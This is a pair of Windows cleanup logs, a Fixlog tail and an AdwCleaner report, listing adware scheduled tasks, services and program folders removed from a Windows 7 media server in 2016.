"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E430EB2-F0D4-45B6-912A-3C11D787E54F}" => key removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Maintenance\SMupdate2" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7E5C382B-DB86-431E-AEAB-8CF69D7ED911}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E5C382B-DB86-431E-AEAB-8CF69D7ED911}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-firefoxinstaller => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{80269159-B28E-4F13-9F6D-57EE3349B0A4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80269159-B28E-4F13-9F6D-57EE3349B0A4}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\APSnotifierPP1 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8135D8E0-C759-4618-93E2-CEB3FE1A49CB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8135D8E0-C759-4618-93E2-CEB3FE1A49CB}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\mr_fun_notification_service => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{81BAFA66-DB16-49F7-8263-631E6BE42114}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{81BAFA66-DB16-49F7-8263-631E6BE42114}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8757F209-3D97-41C9-9C78-567B10E23B83}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8757F209-3D97-41C9-9C78-567B10E23B83}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8C89D02C-C8D4-405C-9D65-CEDDB5C243EC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C89D02C-C8D4-405C-9D65-CEDDB5C243EC}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9361744C-A1E3-465B-BA1A-1F2D434BE3EF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9361744C-A1E3-465B-BA1A-1F2D434BE3EF}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b917f354-73c6-437f-845a-847de7226630-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9470C9FA-D56F-41E0-8C31-E8FA3DCB4FC0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9470C9FA-D56F-41E0-8C31-E8FA3DCB4FC0}" => key removed successfully
C:\Windows\System32\Tasks\Astromenda => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Astromenda => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{953B56D7-95E9-45BE-9459-A7C8CEB53C11}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{953B56D7-95E9-45BE-9459-A7C8CEB53C11}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CIMT_S-1-5-21-2978377406-116969058-805938779-1000 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96A1650B-6E48-4613-AEFE-34294AF2B26D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96A1650B-6E48-4613-AEFE-34294AF2B26D}" => key removed successfully
C:\Windows\System32\Tasks\SFUKRJBE => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SFUKRJBE" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9DDBE0F0-05A4-44E6-ABD1-AAE13541F3EC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DDBE0F0-05A4-44E6-ABD1-AAE13541F3EC}" => key removed successfully
C:\Windows\System32\Tasks\YTDownloaderUpd => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\YTDownloaderUpd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A191E52B-C012-403D-8103-0443BF5CA178}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A191E52B-C012-403D-8103-0443BF5CA178}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-1-6 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AD06492B-964B-4C66-BB1F-83DC7EBBBD31}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AD06492B-964B-4C66-BB1F-83DC7EBBBD31}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b917f354-73c6-437f-845a-847de7226630-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B5E519B9-EBB0-4D9D-A013-FFA9971E8283}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B5E519B9-EBB0-4D9D-A013-FFA9971E8283}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B601E839-C06C-4AB2-BBD3-42DA433CAAFF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B601E839-C06C-4AB2-BBD3-42DA433CAAFF}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ConsumerInputUpdateTaskMachineCore => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B6A7C774-ED5B-432D-8D0A-B3063C4B8373}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B6A7C774-ED5B-432D-8D0A-B3063C4B8373}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-10_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B7BE2A1B-D6B7-4E7D-94CB-825E8CBDE708}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7BE2A1B-D6B7-4E7D-94CB-825E8CBDE708}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ShopperProJSUpd => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BF1CCE45-F0D7-45C6-88F2-F44389676F8B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BF1CCE45-F0D7-45C6-88F2-F44389676F8B}" => key removed successfully
C:\Windows\System32\Tasks\4836 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4836" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C077B919-EDA9-4457-BB55-931550D31E88}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C077B919-EDA9-4457-BB55-931550D31E88}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\a250569a-98c2-4048-95cc-84eb2edcd0f9-10_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6B6EC14-6034-4359-80BD-3CE1FE235DBB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6B6EC14-6034-4359-80BD-3CE1FE235DBB}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gtaUpt => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C7D4E715-84A9-4292-AFAC-2622CD5C7399}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7D4E715-84A9-4292-AFAC-2622CD5C7399}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\a250569a-98c2-4048-95cc-84eb2edcd0f9-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CA6705BB-2A84-4DE6-9B04-1D0292DB6CD2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CA6705BB-2A84-4DE6-9B04-1D0292DB6CD2}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b917f354-73c6-437f-845a-847de7226630-11 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CAE32489-38E8-4B9F-88EC-3E0547DEAA28}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAE32489-38E8-4B9F-88EC-3E0547DEAA28}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-1-7 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CBA4CD96-C146-47E0-9698-CA27256BA2F7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBA4CD96-C146-47E0-9698-CA27256BA2F7}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-3 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD272327-D23F-4471-A849-7FE0FF01090D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD272327-D23F-4471-A849-7FE0FF01090D}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CIMT_daily_S-1-5-21-2978377406-116969058-805938779-1000 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFB6165A-8D8A-4C3F-9E17-2F4E3B5D2EBE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB6165A-8D8A-4C3F-9E17-2F4E3B5D2EBE}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SmartWeb Upgrade Trigger Task => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D24800E9-D72F-4170-B523-E7C2AA29AF6A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D24800E9-D72F-4170-B523-E7C2AA29AF6A}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-4 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D6FF6C58-6292-4C05-8B0D-57EC59C74B48}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D6FF6C58-6292-4C05-8B0D-57EC59C74B48}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b0220ba6-09e4-46a8-8a55-a353b242b387-10_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D833AA11-E23E-4B42-A1D9-9DB2EC492194}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D833AA11-E23E-4B42-A1D9-9DB2EC492194}" => key removed successfully
C:\Windows\System32\Tasks\YTDownloader => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\YTDownloader" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DF32B448-D147-4112-BD7A-42CE73002440}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DF32B448-D147-4112-BD7A-42CE73002440}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b0220ba6-09e4-46a8-8a55-a353b242b387-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E0604DBE-BA0E-4E4B-89E1-D187C4AC4E00}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0604DBE-BA0E-4E4B-89E1-D187C4AC4E00}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Web Protector Plus Server => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E14EB690-DAB0-4B1E-9DAB-E847276BB426}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E14EB690-DAB0-4B1E-9DAB-E847276BB426}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-4 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E16003EC-4060-4D1A-854D-9D83E7FD6A9F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E16003EC-4060-4D1A-854D-9D83E7FD6A9F}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-chromeinstaller => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E79DDE3A-283A-4EB8-A8DB-25A3F1E10FBC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E79DDE3A-283A-4EB8-A8DB-25A3F1E10FBC}" => key removed successfully
C:\Windows\System32\Tasks\0 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\0" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E875ED51-1937-4C3B-AC7B-955A7F2597E6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E875ED51-1937-4C3B-AC7B-955A7F2597E6}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E9567459-8EA7-45F8-AA7E-37D353BC0D26}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9567459-8EA7-45F8-AA7E-37D353BC0D26}" => key removed successfully
C:\Windows\System32\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\e6a4b65b-e1dc-4d98-84ce-5654a35812c9" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EA444C25-CCA5-4E11-B3FB-525A4D9815AB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA444C25-CCA5-4E11-B3FB-525A4D9815AB}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\3315ae47-db79-4ea6-b347-a4b2fa3cb91c-10_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EAA7CAC6-0B86-4AEA-9609-81B789D98898}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EAA7CAC6-0B86-4AEA-9609-81B789D98898}" => key removed successfully
C:\Windows\System32\Tasks\LaunchApp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchApp" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EC6FCC38-4691-4971-AD83-9406D152762E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC6FCC38-4691-4971-AD83-9406D152762E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{ED5CE69B-9BEF-4534-B5F8-CD520A9271C6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED5CE69B-9BEF-4534-B5F8-CD520A9271C6}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F078B885-FC60-448B-ACE0-DB8A472369CD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F078B885-FC60-448B-ACE0-DB8A472369CD}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FA70133E-BDAB-4027-9671-68531A9920DA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA70133E-BDAB-4027-9671-68531A9920DA}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-5_user => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EAA7CAC6-0B86-4AEA-9609-81B789D98898} => key not found. 
C:\Windows\System32\Tasks\LaunchApp => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchApp => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC6FCC38-4691-4971-AD83-9406D152762E} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED5CE69B-9BEF-4534-B5F8-CD520A9271C6} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-5 => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F078B885-FC60-448B-ACE0-DB8A472369CD} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-5_user => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA70133E-BDAB-4027-9671-68531A9920DA} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\9a453951-0637-4363-87cf-6eacfdd0bf82-5_user => key not found. 
C:\Windows\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9.job => moved successfully
C:\Windows\Tasks\FQfcQIFiv3.job => moved successfully
C:\Windows\Tasks\web_disco_notification_service.job => moved successfully
EmptyTemp: => 38.2 MB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 04:32:45 ====
 
 
# AdwCleaner v5.029 - Logfile created 15/01/2016 at 20:02:41
# Updated 11/01/2016 by Xplode
# Database : 2016-01-11.2 [Local]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Nexus Media Server - NEXUS_MEDIA_SVR
# Running from : L:\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[-] Service Deleted : BrsHelper
[-] Service Deleted : sbmntr
[-] Service Deleted : netmon_wfp
[-] Service Deleted : Program Manager
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Program Files\Uninstaller
[-] Folder Deleted : C:\Program Files (x86)\DnsBasic
[-] Folder Deleted : C:\Program Files (x86)\eSupport.com
[-] Folder Deleted : C:\Program Files (x86)\globalUpdate
[-] Folder Deleted : C:\Program Files (x86)\PepperZip
[-] Folder Deleted : C:\Program Files (x86)\predm
[-] Folder Deleted : C:\Program Files (x86)\VideoPerformer
[-] Folder Deleted : C:\Program Files (x86)\YTDownloader
[-] Folder Deleted : C:\Program Files (x86)\speed browser
[-] Folder Deleted : C:\Program Files (x86)\DriverToolkit
[-] Folder Deleted : C:\Program Files (x86)\Itibiti Soft Phone
[-] Folder Deleted : C:\Program Files (x86)\BitSavver
[-] Folder Deleted : C:\Program Files (x86)\CiouupExxtenssion
[-] Folder Deleted : C:\Program Files (x86)\CoolSaleCoupaoNa
[-] Folder Deleted : C:\Program Files (x86)\DiscounTTExTTENsi
[-] Folder Deleted : C:\Program Files (x86)\PriceDowinloader
[-] Folder Deleted : C:\Program Files (x86)\RandomuPiriece
[-] Folder Deleted : C:\Program Files (x86)\RoboSaveirr
[-] Folder Deleted : C:\Program Files (x86)\saviInushoop
[-] Folder Deleted : C:\Program Files (x86)\TakeuTuhoEiCouPon
[!] Folder Not Deleted : C:\Program Files (x86)\PriceDowinloader
[-] Folder Deleted : C:\Program Files (x86)\MediaPlayerV1
[-] Folder Deleted : C:\Program Files (x86)\MediaViewV1
[-] Folder Deleted : C:\Program Files (x86)\RichMediaViewV1
[-] Folder Deleted : C:\Program Files (x86)\Mozilla Firefox\Extensions\{650EED71-89E2-453B-8DCF-2AA1B4AE6EF3}
[-] Folder Deleted : C:\Program Files (x86)\Common Files\ProgramManager
[-] Folder Deleted : C:\ProgramData\Browser
[-] Folder Deleted : C:\ProgramData\Conduit
[-] Folder Deleted : C:\ProgramData\DnsBasic
[-] Folder Deleted : C:\ProgramData\PriceDowinloader
[-] Folder Deleted : C:\ProgramData\cosstminn
[-] Folder Deleted : C:\ProgramData\EEnjouyCCoupon
[!] Folder Not Deleted : C:\ProgramData\PriceDowinloader
[-] Folder Deleted : C:\ProgramData\RoboSAvEri
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
[-] Folder Deleted : C:\Users\LogMeInRemoteUser\AppData\Local\torch
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Boost
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\eSupport.com
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\globalUpdate
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\SmartWeb
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\BreakingNewsAlert
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\DriverToolkit
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\BrowserHelper
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_10599
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_13063
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_133
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_21127
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_27892
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_6498
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\LocalLow\Conduit
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\ap_logs
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\PerformerSoft
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Strongvault
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\lection
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PepperZip
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoPerformer
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
